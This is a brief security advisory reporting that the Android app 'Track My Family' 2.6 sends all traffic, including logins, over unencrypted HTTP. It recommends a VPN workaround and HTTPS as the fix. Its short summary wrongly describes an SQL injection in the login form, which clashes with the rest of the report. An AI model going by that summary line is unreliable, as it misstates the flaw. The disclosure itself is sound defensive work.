SIK-2017-040

Title:

Plaintext Communication in GPS Location Tracker App

Report ID

SIK-2017-040

Summary:

Vendor: SeeBetaApp
Product: Track My Family (Package-name: com.betaapp.myfamilylocator)
Affected Version: 2.6
Severity: high
Short summary: SQLi in Login form breaks authentication

Details:

Every communication between app and its backend uses HTTP connections. HTTP is a plain text protocol, which is not encrypted nor integrity protected. A man-in-the-middle adversary can eavesdrop and modify every traffic between an app user and the backend (e.g. tapping login credentials).

Workaround

Use a VPN connection when using this app.

Suggested Mitigation

Use HTTPs for communicating between app and backend.

Timeline

2017-08-09 Vulnerability Discovered
2017-08-10 Contaced developer
2018-08-11 Published